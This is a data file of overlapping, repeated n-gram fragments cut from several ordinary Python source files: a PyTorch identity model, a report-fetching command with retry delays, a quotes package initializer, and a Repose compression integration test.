v{__version__}\") import guniflask print(f\" guniflask:" ]
[ "copy model returns the identity, # this is its own class so we", "torch # the copy model returns the identity, # this is its own", "to change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel,", "change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__()", "is its own class so we dont have to change the code to", "use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action):", "dont have to change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def", "class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action): return input_frame, torch.zeros(input_frame.shape[0]).cuda()", "have to change the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self):", "code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self,", "own class so we dont have to change the code to use the", "we dont have to change the code to use the copymodel class CopyEnvModel(torch.nn.Module):", "the code to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def", "this is its own class so we dont have to change the code", "copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action): return input_frame,", "to use the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame,", "import torch # the copy model returns the identity, # this is its", "so we dont have to change the code to use the copymodel class", "the identity, # this is its own class so we dont have to", "its own class so we dont have to change the code to use", "identity, # this is its own class so we dont have to change", "# this is its own class so we dont have to change the", "the copy model returns the identity, # this is its own class so", "class so we dont have to change the code to use the copymodel", "model returns the identity, # this is its own class so we dont", "the copymodel class CopyEnvModel(torch.nn.Module): def __init__(self): super(CopyEnvModel, self).__init__() def forward(self, input_frame, input_action): return", "returns the identity, # this is its own class so we dont have", "# the copy model returns the identity, # this is its own class" ]
[]
[ "import logging import time from datetime import timedelta from typing import List import", "games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30),", "not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating", "Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex:", "import List import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS:", "Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5),", "MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30),", "LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now", "import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1),", "RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report", "time from datetime import timedelta from typing import List import requests from games.models", "timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game:", "MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try:", "timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in", "] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return", "requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [", "import timedelta from typing import List import requests from games.models import Game MAX_RETRY_DURATION:", "logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except", "%s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for %s', retry_duration)", "try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s',", "= timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION", "in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch", "RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER", "return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game)", "List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER =", "timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game):", "timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1),", "from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10),", "timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for", "timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS:", "timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration", "= [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez')", "fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for", "retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not", "List import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta]", "requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if", "= logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True)", "from typing import List import requests from games.models import Game MAX_RETRY_DURATION: timedelta =", "LOGGER = logging.getLogger('hbscorez') def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(),", "import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3) RETRY_DURATIONS: List[timedelta] =", "stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration", "fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as", "requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION:", "def fetch_report(game: Game): for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError", "datetime import timedelta from typing import List import requests from games.models import Game", "from datetime import timedelta from typing import List import requests from games.models import", "as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise", "[ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ] LOGGER = logging.getLogger('hbscorez') def", "timedelta(hours=3) RETRY_DURATIONS: List[timedelta] = [ timedelta(seconds=10), timedelta(seconds=30), timedelta(minutes=1), timedelta(minutes=5), timedelta(minutes=30), timedelta(hours=1), MAX_RETRY_DURATION ]", "<filename>src/players/management/commands/fetch_report.py import logging import time from datetime import timedelta from typing import List", "ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex", "logging import time from datetime import timedelta from typing import List import requests", "except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could not fetch report %s', game) if retry_duration ==", "import time from datetime import timedelta from typing import List import requests from", "report %s', game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for %s',", "game) if retry_duration == MAX_RETRY_DURATION: raise ex LOGGER.debug('Now wating for %s', retry_duration) time.sleep(retry_duration.total_seconds())", "timedelta from typing import List import requests from games.models import Game MAX_RETRY_DURATION: timedelta", "for retry_duration in RETRY_DURATIONS: try: return requests.get(game.report_source_url(), stream=True) except requests.exceptions.ConnectionError as ex: LOGGER.warning('Could", "typing import List import requests from games.models import Game MAX_RETRY_DURATION: timedelta = timedelta(hours=3)" ]
[ ".quotes import quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import", "quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import langs def", "from .quotes import quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from .", "import quotes, random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import langs", "quotes_and_authors from .qotd import quote_of_the_day from . import langs def supported_languages(): l =", "random_titles, search, quotes_and_authors from .qotd import quote_of_the_day from . import langs def supported_languages():", "from .qotd import quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:]", "import quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:] l.sort() return", "quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:] l.sort() return l", ".qotd import quote_of_the_day from . import langs def supported_languages(): l = langs.SUPPORTED_LANGUAGES[:] l.sort()", "search, quotes_and_authors from .qotd import quote_of_the_day from . import langs def supported_languages(): l" ]
[ "self.valve is not None: self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases =", "def apply_config_set(config_set_name, params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir,", "log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be", "%(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is None:", "self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map", "load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result =", "setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in", "unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner", "_xmlrunner import logging import time import argparse import os import deproxy logger =", "is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map =", "Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name,", "if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True", "not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader()", "test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true')", "logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port':", "= pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file =", "= {} startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule')", "'all' is the default, and runs all \" \"available test cases\", choices=['all'] +", "set() for tc in args.test_case: if tc == 'all': test_cases = available_test_cases break", "= repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url", "import conf from narwhal import pathutil import xmlrunner as _xmlrunner import logging import", "args.test_case is None: args.test_case = ['all'] test_cases = [] test_cases_set = set() for", "for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if __name__", "is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self):", "import repose import unittest from narwhal import conf from narwhal import pathutil import", "self.valve.stop() if self.deproxy is not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def", "specififed \" \"multiple times. 'all' is the default, and runs all \" \"available", "= tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case',", "break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite()", "test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests =", "== 'all': test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc])", "loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite) if", "logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is", "deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir", "{} startup_wait_time = 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir)", "% repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers)", "unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result", "to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run. Can be specififed", "= {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy =", "#!/usr/bin/env python from narwhal import repose import unittest from narwhal import conf from", "# Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def", "import xmlrunner as _xmlrunner import logging import time import argparse import os import", "args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose", "TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params", "narwhal import conf from narwhal import pathutil import xmlrunner as _xmlrunner import logging", "if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase):", "tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log", "artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port =", "hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params", "test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite = unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase", "conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy() self.end_point", "import os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir =", "= 15 def setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file))", "'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port)", "= pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777", "pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False def apply_config_set(config_set_name, params=None): if params is None: params =", "logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc", "= self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def tearDown(self): logger.debug('tearDown')", "available_test_cases = [ TestCompression ] def run(): test_case_map = dict() for tc_class in", "= [ TestCompression ] def run(): test_case_map = dict() for tc_class in available_test_cases:", "'%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is None: args.test_case", "is None: args.test_case = ['all'] test_cases = [] test_cases_set = set() for tc", "time import argparse import os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(),", "\"multiple times. 'all' is the default, and runs all \" \"available test cases\",", "self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port", "not None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map = dict()", "'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve =", "params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy", "= dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log',", "config_verbose = True if args.test_case is None: args.test_case = ['all'] test_cases = []", "test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser()", "{} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp') self.deproxy = deproxy.Deproxy()", "pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir':", "help=\"Print the log to STDERR.\", action='store_true') parser.add_argument('--test-case', action='append', help=\"Which test case to run.", "run. Can be specififed \" \"multiple times. 'all' is the default, and runs", "'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def", "Can be specififed \" \"multiple times. 'all' is the default, and runs all", "pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port", "available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite =", "repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url =", "= loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports') result = testRunner.run(suite)", "\" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log:", "test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s", "['all'] test_cases = [] test_cases_set = set() for tc in args.test_case: if tc", "format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is", "[] test_cases_set = set() for tc in args.test_case: if tc == 'all': test_cases", "and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args =", "parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose =", "= unittest.TestSuite() loader = unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case))", "= unittest.TestLoader() load_tests = loader.loadTestsFromTestCase for test_case in test_cases: suite.addTest(load_tests(test_case)) testRunner = _xmlrunner.XMLTestRunner(output='test-reports')", "deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname': 'localhost',", "params=None): if params is None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class", "'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file }", "= pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers", "self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map = dict() for tc_class", "args.test_case: if tc == 'all': test_cases = available_test_cases break if tc not in", "%s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings),", "pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port = 8888 stop_port = 7777 deproxy_port = 9999 headers =", "'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip')", "to run. Can be specififed \" \"multiple times. 'all' is the default, and", "'all': test_cases = available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run')", "import logging import time import argparse import os import deproxy logger = logging.getLogger(__name__)", "= deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port, 'target_hostname':", "= available_test_cases break if tc not in test_cases_set: test_cases_set.add(tc) test_cases.append(test_case_map[tc]) logger.debug('run') setUpModule() suite", "default, and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args", "msg=mc) def tearDown(self): logger.debug('tearDown') if self.valve is not None: self.valve.stop() if self.deproxy is", "in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to", "= { 'port': repose_port, 'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file':", "cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:'", "} apply_config_set('configs/.config-set.xml', params=params) self.valve = repose.ReposeValve(config_dir=config_dir, stop_port=stop_port) time.sleep(startup_wait_time) def test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url =", "test_compression_with_gzip(self): logger.debug('test_compression_with_gzip') url = 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1)", "all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if", "repose import unittest from narwhal import conf from narwhal import pathutil import xmlrunner", "pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(),", "available_test_cases: test_case_map[tc_class.__name__] = tc_class parser = argparse.ArgumentParser() parser.add_argument('--print-log', help=\"Print the log to STDERR.\",", "= 'http://localhost:%i/' % repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET',", "repose_port logger.debug('url = %s' % url) time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code,", "the default, and runs all \" \"available test cases\", choices=['all'] + test_case_map.keys(), type=str)", "setUpModule(): # Set up folder hierarchy logger.debug('setUpModule') pathutil.create_folder(config_dir) pathutil.create_folder(deployment_dir) pathutil.create_folder(os.path.dirname(log_file)) config_verbose = False", "'%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose = True if args.test_case is None: args.test_case = ['all']", "global config_verbose config_verbose = True if args.test_case is None: args.test_case = ['all'] test_cases", "unittest from narwhal import conf from narwhal import pathutil import xmlrunner as _xmlrunner", "stop_port = 7777 deproxy_port = 9999 headers = {} startup_wait_time = 15 def", "self.deproxy = deproxy.Deproxy() self.end_point = self.deproxy.add_endpoint(('localhost', deproxy_port)) pathutil.clear_folder(config_dir) params = { 'port': repose_port,", "def run(): test_case_map = dict() for tc_class in available_test_cases: test_case_map[tc_class.__name__] = tc_class parser", "from narwhal import repose import unittest from narwhal import conf from narwhal import", "deproxy_port = 9999 headers = {} startup_wait_time = 15 def setUpModule(): # Set", "'target_hostname': 'localhost', 'target_port': deproxy_port, 'deployment_dir': deployment_dir, 'artifact_dir': artifact_dir, 'log_file': log_file } apply_config_set('configs/.config-set.xml', params=params)", "config_verbose config_verbose = True if args.test_case is None: args.test_case = ['all'] test_cases =", "choices=['all'] + test_case_map.keys(), type=str) args = parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:'", "time.sleep(1) mc = self.deproxy.make_request(method='GET', url=url, headers=headers) self.assertEqual(mc.received_response.code, '200', msg=mc) self.assertEqual(len(mc.handlings), 1, msg=mc) def", "None: self.deproxy.shutdown_all_endpoints() available_test_cases = [ TestCompression ] def run(): test_case_map = dict() for", "= parser.parse_args() if args.print_log: logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s %(levelname)s:%(name)s:' '%(funcName)s:' '%(filename)s(%(lineno)d):' '%(threadName)s(%(thread)d):%(message)s')) global config_verbose config_verbose", "deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log') repose_port", "None: params = {} conf.process_config_set(config_set_name, verbose=config_verbose, destination_path=config_dir, params=params) class TestCompression(unittest.TestCase): def setUp(self): logger.debug('setUp')", "args.test_case = ['all'] test_cases = [] test_cases_set = set() for tc in args.test_case:", "config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file", "for tc in args.test_case: if tc == 'all': test_cases = available_test_cases break if", "'etc/repose') deployment_dir = pathutil.join(os.getcwd(), 'var/repose') artifact_dir = pathutil.join(os.getcwd(), 'usr/share/repose/filters') log_file = pathutil.join(os.getcwd(), 'var/log/repose/current.log')", "os import deproxy logger = logging.getLogger(__name__) config_dir = pathutil.join(os.getcwd(), 'etc/repose') deployment_dir = pathutil.join(os.getcwd(),", "pathutil.join(os.getcwd(), 'var/repose') artifact_dir = 